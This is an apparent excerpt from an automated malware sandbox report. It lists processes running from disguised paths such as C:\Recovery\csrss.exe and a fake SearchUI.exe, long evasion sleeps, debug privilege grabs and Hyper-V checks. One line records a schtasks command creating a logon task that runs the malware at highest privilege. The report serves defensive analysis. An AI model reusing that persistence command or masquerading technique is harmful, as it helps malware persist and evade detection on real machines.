                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe TID: 3444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe TID: 2264Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Recovery\csrss.exe TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exe TID: 1052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Recovery\csrss.exe TID: 4160Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: powershell.exe, 00000019.00000002.681874432.0000000005926000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553802226.0000000001185000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                    Source: powershell.exe, 00000016.00000002.699860253.000000000AB5B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.700043009.000000000B57B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.681874432.0000000005926000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.707857999.000000000B096000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\csrss.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\csrss.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess token adjusted: Debug
                    Source: C:\System Volume Information\Chkdsk\SearchUI.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess token adjusted: Debug
                    Source: C:\Recovery\csrss.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
